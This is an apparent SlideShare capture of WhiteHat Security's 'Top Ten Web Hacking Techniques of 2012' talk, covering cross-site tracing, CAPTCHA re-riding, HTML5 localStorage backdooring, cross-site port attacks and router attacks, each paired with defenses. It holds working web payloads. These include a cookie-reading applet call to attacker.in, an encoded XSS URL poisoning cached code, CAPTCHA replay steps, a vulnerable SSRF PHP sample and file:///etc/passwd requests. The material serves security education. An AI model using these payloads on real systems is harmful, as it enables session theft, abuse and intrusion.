SlideShare a Scribd company logo
TOP TEN WEB HACKING
TECHNIQUES OF 2012
ABO U T




Jeremiah Grossman
    •    Founder & CTO of WhiteHat Security
    •    TED Alumni
    •    InfoWorld Top 25 CTO
    •    Co-founder of the WASC
    •    Co-author: XSS Attacks
    •    Former Yahoo! information security officer
    •    Brazilian Jiu-Jitsu Black Belt


Matt Johansen
•       Head of WhiteHat's Threat Research Center
•       BlackHat, DEFCON, RSA Speaker
•       Oversees assessment of 15,000+ websites
•       Background in Penetration Testing
•       Hacker turned Management
•       I'm hiring… a lot…


    © 2013 WhiteHat Security, Inc.                    2
ABO U T




WhiteHat Security, Inc.
• Founded 2001
• Head quartered in Santa Clara, CA
• Employees: 260+
• WhiteHat Sentinel: SaaS end-to-end website risk
  management platform (static and dynamic analysis)
• Customers: 500+ (banking, retail, healthcare, etc.)




© 2013 WhiteHat Security, Inc.                          3
ABOUT THE TOP TEN




© 2013 WhiteHat Security, Inc.         4

Recommended for you

Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection

The document discusses various methods for preventing SQL injection attacks, including input validation, using static query statements, and least privilege approaches. It provides detailed explanations and examples of how to properly implement input validation, including escaping special characters, validating numeric fields, and preventing second-order SQL injection. The document also cautions that approaches like parameterized statements and stored procedures do not automatically prevent SQL injection and can still be vulnerable if not implemented correctly.

Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)

Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by a user's browser. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server display input containing malicious JavaScript from a request. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating, sanitizing, and escaping all user input on the server-side and client-side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.

xsscross site scripting
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)

Cross-site scripting (XSS) is a type of vulnerability in web applications that allows attackers to inject client-side scripts. There are three main types of XSS - reflected XSS occurs when malicious scripts are included in links or requests to the server, stored XSS happens when scripts are stored on the server through forums or comments, and local XSS executes without contacting the server through PDFs or Flash. XSS can lead to compromised user accounts, denial of service attacks, or access to users' local machines. Developers can prevent XSS through input validation, encoding output, and keeping software updated.

―Every year the security community produces a stunning
    amount of new Web hacking techniques that are
    published in various white papers, blog posts, magazine
    articles, mailing list emails, conference
    presentations, etc. Within the thousands of pages are
    the latest ways to attack websites, Web
    browsers, Web proxies, and their mobile platform
    equivalents. Beyond individual vulnerabilities with CVE
    numbers or system compromises, here we are solely
    focused on new and creative methods of Web-based
    attack.‖


© 2013 WhiteHat Security, Inc.                                5
H ISTO RY




Past Years
                           2011      • BEAST
               (51 new techniques)

                          2010       • 'Padding Oracle' Crypto Attack
               (69 new techniques)

                          2009       • Creating a rogue CA certificate
               (80 new techniques)

                          2008       • GIFAR (GIF + JAR)
               (70 new techniques)

                          2007       • XSS Vulnerabilities in Common
               (83 new techniques)     Shockwave Flash Files

                          2006       • Web Browser Intranet Hacking / Port
               (65 new techniques)     Scanning


© 2013 WhiteHat Security, Inc.                                               6
T H E YEAR 2 0 1 2




56 NEW Techniques
1. CRIME
2. Pwning via SSRF (memcached, php-fastcgi, etc)
3. Chrome addon hacking
4. Bruteforce of PHPSESSID
5. Blended Threats and JavaScript
6. Cross-Site Port Attacks
7. Permanent backdooring of HTML5 client-side application
8. CAPTCHA Re-Riding Attack
9. XSS: Gaining access to HttpOnly Cookie in 2012
10.Attacking OData: HTTP Verb Tunneling, etc.

  http://blog.whitehatsec.com/top-ten-web-hacking-techniques-of- 2012/

© 2013 WhiteHat Security, Inc.                                           7
2 0 1 2 TO P T EN

                                   Attacking Odata:
                                   HTTP Verb
                                   Tunneling, Navigation
                                   Properties for Additional Data
                                   Access,
                                   System Query Options ($select)
 ―The Open Data Protocol (OData) is an open web protocol
 for querying and updating data. OData enables the creation
 of HTTP-based RESTful data services that can be used to
 publish and edit resources that are identified using uniform
 resource identifiers (URIs) with simple HTTP messages. This
 paper looks at OData from a penetration testing perspective
 and introduces various OData concepts as we progress.‖


Gursev Singh Kalra
http://www.mcafee.com/us/resources/white-papers/foundstone/wp-pentesters-guide-to-hacking-odata.pdf



 © 2013 WhiteHat Security, Inc.                                                                       8

Recommended for you

Xss ppt
Xss pptXss ppt
Xss ppt

Cross-site scripting (XSS) is the most common web application vulnerability. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. Reflected XSS occurs when malicious scripts are included in hyperlinks and infect the victim's browser when the link is clicked. Stored XSS involves injecting malicious scripts into the application itself, which are then executed when users access stored information. DOM-based XSS modifies the DOM environment used by client-side scripts, causing them to run unexpectedly and potentially harmfully. All XSS attacks allow attackers to hijack user sessions, insert hostile content, and fully compromise users. Applications can prevent XSS by validating all input

cyber security
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]

This document summarizes a presentation about assessing the security of Web 2.0 technologies like Ajax and web services. It discusses the Web 2.0 industry trends, technologies like Ajax, potential security impacts, and methodologies for fingerprinting, enumerating, crawling, and scanning Ajax applications and web services to identify vulnerabilities. It also provides an overview of attacking Ajax and defending applications.

Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N Nessus

This document summarizes different types of network scans that can be performed using Nmap, including TCP connect scans, SYN scans, FIN scans, Xmas scans, Null scans, and least traffic scans. It also discusses why vulnerability scanning is important and compares the features of the free Nessus Home Feed versus the paid Professional Feed for vulnerability scanning. The Professional Feed provides more frequent plugin updates, policy compliance checks, unlimited PCI audits, operating system audits, and technical support compared to the free Home Feed.

2 0 1 2 TO P T EN




                                       XSS: Gaining access
                                       to HttpOnly Cookie in 2012
‗If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be
accessed through client side script. As a result, even if a cross-site scripting (XSS) flaw exists, and
a user accidentally accesses a link that exploits this flaw, the browser will not reveal the cookie to a
third party. The following describes techniques to gain access to HttpOnly cookie data via client-
side attack.‖




http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html


© 2013 WhiteHat Security, Inc.                                                                         9
BASIC S




HttpOnly cookie flag


 Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
 [; expires=<date>][; domain=<domain_name>]
 [; path=<some_path>][; secure][; HttpOnly]




js> alert(document.cookie);
When a cookie has an HttpOnly cookie flag the
returned value is blank.




https://www.owasp.org/index.php/HttpOnly

© 2013 WhiteHat Security, Inc.                   10
H ISTO RY




CROSS-SITE TRACING (XST) [circa 2003]
 Force cookie values into the body of the HTTP response where there is no
 HttpOnly protection.
  <script>                                      TRACE / HTTP/1.1
   var xmlhttp = new XMLHttpRequest();          Host: foo.bar
   var url = 'http://foo.com/';
                                                HTTP/1.1 200 OK
   // send cookie header                        Date: Mon, 02 Dec 2002 19:24:51 GMT
   xmlhttp.withCredentials = true;              Server: Apache/2.0.40 (Unix)
   xmlhttp.open('TRACE', url, false);           Content-Type: message/http
   xmlhttp.send();                              TRACE / HTTP/1.1
  </script>                                     Host: foo.com
                                                Cookie: httpOnly cookie value



 Performing an XST attack, at the time, required either a cross-domain browser
 vulnerability, or an XSS vulnerability in the target website.


https://www.owasp.org/index.php/Cross_Site_Tracing
http://www.cgisecurity.com/lib/WH-WhitePaper_XST_ebook.pdf

© 2013 WhiteHat Security, Inc.                                                        11
BR O W SER F IX




No TRACE (No TRACK)
Today, no modern browser allows javascript to use these HTTP request methods.




The same is true of Flash, Silverlight, and Java Applets. Well, almost…

© 2013 WhiteHat Security, Inc.                                                  12

Recommended for you

WannaCry ransomware attack
WannaCry ransomware attackWannaCry ransomware attack
WannaCry ransomware attack

The document summarizes the WannaCry/WannaCrypt ransomware attack that affected over 200,000 victims globally in May 2017. It briefly describes how the ransomware works by encrypting files and demanding ransom payments in bitcoin. It also provides details on how systems get infected, the impacts on victims including encrypted files and ransom messages, and recommendations on how to protect systems by patching vulnerabilities and using backups.

ransomware attackwannacry attackwannacry
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)

Cross-Site Scripting (referred to as XSS) is a type of web application attack where malicious client-side script is injected into the application output and subsequently executed by the user’s browser.

XSS- an application security vulnerability
XSS-   an application security vulnerabilityXSS-   an application security vulnerability
XSS- an application security vulnerability

One of the most typical web application security vulnerabilities Cross-Site Scripting (XSS). What does it mean to Developer? How they are important? What should we keep in mind? How could we prevent this to some extend as Developer? How Attackers proceed? Many mores..

#security #developer #sitmuc #sap #hacking
XST 2 0 1 2




Java Applet (PoC)
getHeaderField, under the java.net.URLConnection package
Applet requests a URL and reads set-cookie response header
 alert(new
 java.net.URL('http://attacker.in/xss/cookie.php').openConnection().getHeaderFi
 eld('set-cookie'));


“…a vulnerable page in a real-
world application may have
already issued the HttpOnly
cookie by the time the script has
executed.”




Might also be able force out all cookies by overloading them. Cookie Exhaustion.
http://www.slideshare.net/jeremiahgrossman/breaking-browsers-hacking-autocomplete-blackhat-usa-2010

© 2013 WhiteHat Security, Inc.                                                                        13
SO L U T ION




                       UNINSTALL JAVA
                                       [on the client, not the server]
                            For this and about 1,000 other [zero-day] reasons.




© 2013 WhiteHat Security, Inc.                                                   14
2 0 1 2 TO P T EN




                                       CAPTCHA
                                       Re-Riding Attack
―CAPTCHA Re-Riding Attack bypasses the CAPTCHA
protection built into the web applications. The attack exploits the
fact that the code that verifies CAPTCHA solutions sent by the
user during form submissions does not clear the CAPTCHA
solution from the HTTP Session.‖

 Completely Automated Public Turing test to tell
 Computers and Humans Apart

Gursev Singh Kalra
http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html


© 2013 WhiteHat Security, Inc.                                          15
BASIC S




CAPTCHA Protected Registration Flow




© 2013 WhiteHat Security, Inc.        16

Recommended for you

Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)

Cross-site scripting (XSS) allows malicious code to be injected into web applications, potentially enabling attacks like cookie theft, account hijacking, and phishing. There are three main types of XSS attacks: reflected, stored, and DOM-based. Reflected XSS tricks the user into clicking a malicious link, while stored XSS embeds malicious code directly into the website. DOM-based XSS targets vulnerabilities in client-side scripts. XSS remains a significant threat and proper input validation and output encoding are needed to help prevent attacks.

Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course

The document provides an overview of ways to secure Windows systems, beginning with general advice like enabling drive encryption with BitLocker or VeraCrypt, using strong passwords, and implementing the principle of least privilege for access control. It discusses Windows tools like Cmd, PowerShell, Windows Event Viewer, and the Windows Registry that can help secure and monitor systems. The document also provides an introduction to Active Directory, including its components, structure, and use of group policy for centralized management. It concludes with an overview of updated Microsoft security tools like Defender Security Center, Exploit Guard, Attack Surface Reduction, and Event Forwarding.

windows securitywindows defenderactive directory
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection

This presentation will provide you the deep knowledge of the Cross-Site Scripting and SQL Injection with the remediation and prevention measures.

information securityeducationinformation technology
T EL LTAL E SIG N S




What to look for…
1) captcha.php is responsible for updating the HTTP session with correct CAPCHA
   solution.
2) CAPTCHA solution inside the HTTP session is not explicitly cleared during the
   verification process.
3) After registration succeeds, users are redirected to next step and the CAPTCHA
   generation page (/captcha.php) is not likely called for current SESSION again.
   Allows CAPTCHA solution to stay stored for as long as SESSION is valid.
Two possible vulnerable behavior:
  a. Web application uses the same SESSIONID for the same HTTP session.
  b. Web application generates a new SESSIONID for the same HTTP session.



 In either case, the HTTP Session continues to store the CAPTCHA solution as it
 is not explicitly cleared by the CAPTCHA verification code….


© 2013 WhiteHat Security, Inc.                                                      17
AT TAC K




3a)
1) Load the register page of the target website in a web browser.
2) Solve the CAPTCHA manually and submit the form.
3) Record form submission using a web proxy. This request contains a valid
   SESSIONID, valid form fields, and a valid CAPTCHA solution.
4) Create a custom script that repeatedly sends this request to the server. With each
   request change the unique values (like User ID) to create multiple new accounts
   with a single CAPTCHA solution.




© 2013 WhiteHat Security, Inc.                                                          18
AT TAC K




3b)
1) Load the register page of the target website in a web browser.
2) Solve the CAPTCHA manually, and submit the form.
3) Trap this request in a web proxy and do not allow it to reach the web server. This
   request contains a valid SESSIONID, valid form fields and a valid CAPTCHA
   solution.
4) Create a custom script that repeatedly sends this request to server.
5) Submit one request.
6) Upon successful submission, the web application will reset the current SESSIONID
   and send new SESSIONID back in response headers.
7) Change the value of SESSIONID in recorded request (step 3) to the value copied
   from response in Step 6 above.
8) Go to step 5.
9) Able to make multiple successful submissions with single CAPTCHA solution.


© 2013 WhiteHat Security, Inc.                                                          19
D EF EN SE




―The best defense is to reset CAPTCHA solution inside the HTTP session during the
CAPTCHA verification stage. It is also important to note that when a website relies on
third-party CAPTCHA provider, it does not maintain any session information at its end
and CAPTCHA is performed by the CAPTCHA provider. These websites are not
vulnerable to CAPTCHA Re-Riding Attack.‖




© 2013 WhiteHat Security, Inc.                                                           20

Recommended for you

XSS
XSSXSS
XSS

About XSS security, their impact on PHP applications. Some examples of xss attacks. Solution for xss attacks.

xss solutionxsssecurity
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...

Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. It can be used for effective and fast security analysis of Android and iOS Applications and supports both binaries (APK & IPA) and zipped source code. MobSF can also perform Web API Security testing with it's API Fuzzer that can do Information Gathering, analyze Security Headers, identify Mobile API specific vulnerabilities like XXE, SSRF, Path Traversal, IDOR, and other logical issues related to Session and API Rate Limiting.

mobsfmobile security frameworkandroid security
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass

Another way to bypass WAF Cheat Sheet

2 0 1 2 TO P T EN




                                        Permanent backdooring
                                        of HTML5 client-side
                                        application
―To improve performance, particularly for mobile users, many
websites have started caching app logic on client devices via HTML5
local storage. Unfortunately, this can make common injection
vulnerabilities even more dangerous, as malicious code can invisibly
persist in the cache. Real-world examples of this problem have now
been discovered in third-party ―widgets‖ embedded across many
websites, creating security risks for the companies using such
services – even if their sites are otherwise protected against
attacks.‖

Joey Tyson
http://securitymusings.com/article/3159/how-a-platform-using-html5-can-affect-the-security-of-your-website

© 2013 WhiteHat Security, Inc.                                                                               21
PR ER EQ U ISIT ES




What to watch out for…
• A Web application caching [javascript] code in HTML5 local storage, rather than
  routinely downloading it across the network every time the app/page is visited.
  Developers find doing this may provide a significant performance boost, particularly
  on mobile devices, where bandwidth and typical caches can be much more limited.



What the bad guy may do next…
• If the code saved in the local storage is compromised, via XSS exploit for
  example, an attacker could inject malicious code that persists in the client-side
  cache. This payload would then be executed by the web app each time a user
  opens the site – even if they‘d previously closed the browser. A single ―reflected‖
  XSS attack can poison the local storage for every following page the user visits on
  that site.




© 2013 WhiteHat Security, Inc.                                                          22
M ASS PW N AG E




Making Matters Worse:
• Eradicating such [malicious] code can be quite difficult, and the victim website might
  not even be able to detect an ongoing attack.
• Reminder: When a developer includes third-party JavaScript on his or her site, that
  code has the same capabilities as any other script on the page.
• Modifying static file on a remote server is generally not possible, even if cross-site
  scripting issues are present, but what if a third-party script from a site with XSS
  problems also stored code in local storage?



 “If content from the compromised origin is commonly embedded on third-party
 pages (think syndicated „like‟ buttons or advertisements), with some
 luck, attacker‟s JavaScript may become practically invincible.”
 - Michal Zalewski


http://events.ccc.de/congress/2011/Fahrplan/events/4811.en.html
http://jeremiahgrossman.blogspot.com/2010/07/third-party-web-widget-security-faq.html


© 2013 WhiteHat Security, Inc.                                                             23
IN - T H E -WILD




Apture (acquired by Google):
• Provided pop-up boxes for exploring content
  related to highlighted terms in a page.
• A 3rd-party ―widget‖ service that used local
  storage code caching – and a page on the
  same domain as those scripts had a reflected
  XSS vulnerability which could be used to
  inject malicious code in the cache. This code
  would then be executed in the context of the
  site using Apture. The problem with Apture‘s
  service affected the security of many sites
  across the web.




© 2013 WhiteHat Security, Inc.                    24

Recommended for you

Eternal blue Vulnerability
Eternal blue VulnerabilityEternal blue Vulnerability
Eternal blue Vulnerability

Eternal Blue was a cyberattack exploit developed by the NSA that was leaked in 2017 and used in several ransomware attacks. It allowed remote code execution via SMBv1 by exploiting three bugs related to incorrect data type casting, transaction parsing, and memory allocation. While patches were released, many systems remained unpatched, allowing the widespread use of Eternal Blue in attacks like WannaCry and NotPetya.

Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)

Cross-site scripting (XSS) allows malicious code injection into web applications. There are three types of XSS vulnerabilities: non-persistent, persistent, and DOM-based. To avoid XSS, developers should eliminate scripts, secure cookies, validate input, and filter/escape output. Proper coding practices can help prevent XSS attacks.

5 Proven Strategies for Working Capital
5 Proven Strategies for Working Capital5 Proven Strategies for Working Capital
5 Proven Strategies for Working Capital

This document summarizes a webcast about improving working capital through various payment strategies. It discusses 5 proven strategies: 1) faster invoice approval through automation, 2) improving payment terms through supplier onboarding, 3) enabling more early payment discounts through dynamic discounting, 4) capturing rebates through buyer-initiated payments, and 5) expanding available cash through supply chain financing. Technology plays a key role in enabling these strategies through features like collaborative workflows, financial solutions, and connecting all parties. The webcast highlights how these strategies can save millions through increased working capital compared to traditional AP automation alone.

U SAG E




To use Apture widgets:



•   Dynamically loaded an external script hosted on apture.com with a site token specified. This code
    loaded another script based on the user‘s browser which actually began setting up the framework for
    Apture to integrate with the site‘s content.
•   The script inserted an inline frame into the page that loaded a file from cdn.apture.com. A callback
    function allowed this iframe to pass messages back to the original window context where the script is
    running (the non-Apture site). This iframe then loaded the actual app logic and passed the code back
    to the original site via the cross-document messaging interface.
•   Apture‘s iframe setup allowed them to take advantage of another HTML5 innovation that made their
    service load much faster. Web storage functionality provides the localStorage object, a place to save
    key/value data on the client which allows for more space and flexibility than cookies.
•   Apture used a localStorage object for cdn.apture.com not only to save data, such as an ID for
    tracking users, but to actually cache their app logic code. If the cdn.apture.com iframe detected that
    this cache already existed, it would simply load the code from localStorage rather than issue another
    HTTP request for the 272KB worth of JavaScript – saving time and bandwidth.

© 2013 WhiteHat Security, Inc.                                                                          25
EXPL O ITAT ION




EVAL is EVIL

  Like everyone else, Apture had an exploitable XSS vulnerability. This URL
  includes a script that appends ―alert(document.cookie)‖ to the app logic in
  localStorage:
  http://cdn.apture.com/search/xss?yt=%22%3E%3Cscript%3Eif%28window.x%21%3D1%29%7Blo
  calStorage%5B%27app-49971756%27%5D%3DlocalStorage%5B%27app-
  49971756%27%5D%2b%22alert%28document.cookie%29%3B%22%7Dwindow.x%3D1%3C%
  2fscript%3E
  Once this vulnerability is used to insert attack code into localStorage, visiting any site that had
  Apture‘s widgets would cause the attack code to be loaded from the Apture iframe and executed in
  the context of the non-Apture site. Since this is essentially an example of DOM-based XSS (the
  code is loaded dynamically on the client side), requests sent to those sites‘ servers would not
  include any XSS fingerprints, such as <script> in a GET or POST parameter.
  The localStorage code caching turned one reflected XSS vulnerability on Apture’s site into
  persistent, client-side XSS across all domains using their service.




© 2013 WhiteHat Security, Inc.                                                                          26
D EF EN SE




No Simple Answers 
  Trade-offs between performance and risk
  • Application cache, another new HTML5 features, is actually geared towards
    precisely this use case and harder to compromise, but it can create UI
    warnings in some browsers [Firefox]. (Such warnings are a good practice, but
    undesirable for third-party widgets.)
  • Data in local storage should be treated as untrusted, even if it‘s just content
    instead of code.
  • If local storage is used for scripts, it should be accessed from a domain only
    serving static files, which reduces the likelihood of XSS vulnerabilities.
  • Newer browsers also support features such as sandboxed inline frames and
    Content Security Policy that could help limit the impact of embedded widgets if
    they became compromised.




© 2013 WhiteHat Security, Inc.                                                        27
2 0 1 2 TO P T EN




                                        Cross-Site
                                        Port Attacks
―Many web applications provide functionality to pull data from other
webservers for various reasons. Using user specified URLs, web
applications can be made to fetch images, download XML feeds from
remote servers, text based files etc. This functionality can be abused
by making crafted queries using the vulnerable web application as a
proxy to attack other services running on remote/local servers.
Attacks arising via this abuse of functionality are named as Cross-
Site Port Attacks (XSPA).‖
―Riyaz Ahemed Walikar
http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html

Robert Hansen
http://www.sectheory.com/intranet-hacking.htm

© 2013 WhiteHat Security, Inc.                                                 28

Recommended for you

Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016
Internet banking safeguards vulnerabilities - OWASP AppSec EU 2016

Presentation from OWASP AppSec EU 2016 Rome All internet banking applications are different but all of them share many common security features which are very specific to this domain of web applications, such as: • transaction limits, • notifications via SMS or e-mail, • authorization schemes, • trusted recipients, • two-factor authentication and transaction authorization, • pay-by-links, • communication channel activation (e.g. mobile banking or IVR), It is not very rare that these safeguards are incorrectly implemented leaving the internet banking application vulnerable. Last year at AppSec EU I was talking about common vulnerabilities in e-banking transaction authorization. As a follow-up to this presentation, OWASP Transaction Authorization Cheat Sheet was published and gained some attention from banks, developers and testers. This year, I want to continue and expand this work to other security mechanisms which are specific and common to internet banking applications. During my presentation I want to show some common mistakes made during implementation of the abovementioned internet banking safeguards. As a follow-up, I am planning to expand OWASP Transaction Authorization Cheat Sheet to Internet Banking Cheat Sheet which will include guidelines for secure implementation of all security mechanisms common to contemporary internet banking applications. At the end of my presentation, I also want to discuss the idea of expanding key OWASP materials such as ASVS, Testing Guide, Development guide by adding appendixes specific to group of applications (such as internet/mobile banking, e-commerce, etc.).

internet banking security
Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015Cyber war a threat to indias homeland security 2015
Cyber war a threat to indias homeland security 2015

The document discusses cyber warfare as a threat to India's homeland security. It notes India's increasing reliance on digital infrastructure and discusses potential future cyber incidents like power grid failures, financial system paralysis, and satellite or communication system disruptions. The document outlines challenges like attribution of attacks and issues with cyber deterrence. It also examines threats in India's cyber domain from state actors like China and Pakistan as well as non-state groups, and argues for integrating cyber security into India's overall homeland security strategy.

cyber warcyberspacehomeland
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo

Content Security Policy (CSP) is a browser security mechanism against content injection. Using the CSP header, browsers can restrict content from just the domains whitelisted in the policy. This session shares lessons learned with deploying CSP at Yahoo.

csp xss websec webapp security csptester bsidesdc
3 - T IER



XSPA allows attackers to abuse functionality in web applications to:
1. Port Scan remote Internet facing servers, intranet devices and the local web server itself.
2. Exploiting vulnerable programs running on the Intranet or on the local web server
3. Attacking internal/external web applications that are vulnerable to GET parameter based
   vulnerabilities (SQLi via URL, parameter manipulation etc.)
4. Fingerprinting intranet web applications using standard application default files & behavior
5. Reading local web server files using the file:/// protocol handler.




© 2013 WhiteHat Security, Inc.                                                                    29
T EL LTAL E SIG N




© 2013 WhiteHat Security, Inc.   30
C O D E SAMPL E


<?php
if (isset($_POST['url']))
{
$link = $_POST['url'];
$filename = './curled/'.rand().'txt';
$curlobj = curl_init($link);
$fp = fopen($filename,"w");
curl_setopt($curlobj, CURLOPT_FILE, $fp);
curl_setopt($curlobj, CURLOPT_HEADER, 0);
curl_exec($curlobj);
curl_close($curlobj);
fclose($fp);
$fp = fopen($filename,"r");
$result = fread($fp, filesize($filename));
fclose($fp);
echo $result;
?>




     © 2013 WhiteHat Security, Inc.          31
R EAL - W ORL D AT TAC K




 Port Scanning using Google Webmaster Tools




 © 2013 WhiteHat Security, Inc.               32

Recommended for you

Hacking
HackingHacking
Hacking

What is hacking? History of hacking. Who is hacker and cracker? Difference between hacker & cracker. Types of hacking. Benefits Of Computer Hacking Security Conclusion (How to hack your friend account or his/her password?)

computer science
Owasp summit 2017
Owasp summit 2017 Owasp summit 2017
Owasp summit 2017

The document describes plans for the OWASP Summit 2017 conference to be held in London from June 12-16. It will bring together application security experts, developers, users, and vendors to collaborate on hard problems through workshops and discussions from 8am to late at night. Workshop ideas include mobile security, security scanners, GitHub integrations, and threat modeling. Tickets are £1,200 or £400 and sponsorships are being sought. Leaders are needed for additional workshops. The objective is to focus on collaboration between OWASP projects, developers, security teams, DevOps, and executives.

application securityowaspsummit
National cyber security policy 2013
National cyber security policy  2013National cyber security policy  2013
National cyber security policy 2013

This is my attempt to summarize the policy with salient points. For detailed verbose policy please visit http://deity.gov.in/hindi/sites/upload_files/dithindi/files/ncsp_060411.pdf

indiancsp-2013national cyber security policy
AT TAC K




Port Scanning using Google Webmaster Tools




© 2013 WhiteHat Security, Inc.               33
AT TAC K




Port Scanning using Google Webmaster Tools




© 2013 WhiteHat Security, Inc.               34
AT TAC K




Reading local files using file:/// protocol
Request: file:///C:/Windows/win.ini




© 2013 WhiteHat Security, Inc.                35
AT TAC K



Adobe's Omniture web application file:///etc/passwd




© 2013 WhiteHat Security, Inc.                        36

Recommended for you

Indian perspective of cyber security
Indian perspective of cyber securityIndian perspective of cyber security
Indian perspective of cyber security

How does India stand in the perspective of global terrorism and does it have enough countermeasures to tackle the ever growing threat of cyber crime

indian perspective of cyber crimeview of cyber crime in global contextcyber terrorism
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation

This document discusses ethical hacking. It defines hacking as unauthorized use of computer and network resources, and describes different types of hackers such as black hat, white hat, and grey hat. It then defines ethical hacking as a methodology used by trusted professionals to discover vulnerabilities in information systems. The document outlines skills required of an ethical hacker such as knowledge of operating systems, networking protocols, and security tools. It describes the steps an ethical hacker takes including reconnaissance, scanning, gaining access, and clearing tracks. Finally, it discusses advantages like improving security, and disadvantages like potential misuse of access.

presentationppt
Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001Best Practices in Auditing ISO/IEC 27001
Best Practices in Auditing ISO/IEC 27001

Due to the dramatic increase of threats worldwide, there is a need for the companies to find ways how to increase the information security. Therefore, one solution is to implement the ISO/IEC 27001 in order to protect information both internally and externally. Main points that will be covered are: • The scope of ISO 27001 & associated other standards references • Information Security and ISIM Terminologies • ISIM auditing principles • Managing audit program & audit activities Presenter: Eng. Kefah El-Ghobbas is a specialist in ‘Business Process Excellence' through ‘Business Process Re-engineering' with over 20 years of experience. Link of the recorded session published on YouTube: https://youtu.be/rTxA8PVULUs

isoismsauditing
D EF EN SE



• Response Handling: If a web application expects specific content type on the
  server, programmatically ensure the data received satisfies checks imposed on the
  server before displaying or processing the data for the client.
• Error handling and messages: Display generic error messages when something
  goes wrong. If content type validation fails, display generic errors to the client like
  "Invalid Data retrieved". Also ensure message are the same when the request fails
  on the backend and if invalid data is received. This prevents the application from
  being abused as distinct error messages will be absent for closed and open ports.
• Restrict connectivity to HTTP based ports: Restrict the ports to which the web
  application can connect to, such as HTTP ports: 80, 443, 8080, 8090 etc. Doing so
  can lower the attack surface.
• Blacklist IP addresses: Internal IP addresses, localhost specifications and internal
  hostnames can all be blacklisted to prevent the web application from being abused
  to fetch data/attack these devices.
• Disable unwanted protocols: Only allow http and https to make requests to
  remote servers. Whitelisting these protocols will prevent the web application from
  making requests over other protocols like file:///, gopher://, ftp:// and other URI
  schemes.

© 2013 WhiteHat Security, Inc.                                                              37
2 0 1 2 TO P T EN




                                       Blended Threats
                                       and JavaScript
―During 2006, it was shown how common Web browser attacks could be
leveraged bypass perimeter firewalls. In the years since, the fundamental
problems were never addressed and the Intranet remains wide open, probably
because the attack techniques described had important limitations. These
limitations prevented mass scale and persistent compromise of network
connected devices, which include but are not limited to home broadband
routers. Now in 2012, with the help of new research and next-generation
technologies like HTML5, browser-based Intranet attacks have overcome many
of the old limitations and improved to a new degree of scary.‖

Phil Purviance and Josh Brashars
https://superevr.com/blog/2012/blended-threats-and-javascript/

© 2013 WhiteHat Security, Inc.                                               38
BASIC S




Web Threats -> Network Compromise
• Utilize an XSS bug to poke holes in Intranet network
• Take advantage of very outdated security in routers
• Flash the firmware of that router via XSS, File Upload Abuse, &
  CSRF
• Permanent compromise




© 2013 WhiteHat Security, Inc.                                 39
T H E AT TAC K




Scan The Intranet




                                                     Yay HTML5!



JavaScript Intranet scan, nothing new or fancy but
does return a list of internal Ips that are up and
listening.



© 2013 WhiteHat Security, Inc.                                    40

Recommended for you

Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security Best practices and Government role in Cyber Security
Best practices and Government role in Cyber Security

This document discusses cyber security and the importance of protecting critical infrastructure and information societies from cyber threats. It notes that while information technologies provide benefits, societies have grown dependent on them and vulnerable to attacks. It argues that cyber security must be an important part of developing the information society and requires new technologies, policies, legislation, organizations, education, and cooperation across different levels including individuals, organizations, states, allies and the world. The document uses Estonia as an example of implementing different cyber security measures across these levels.

Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016

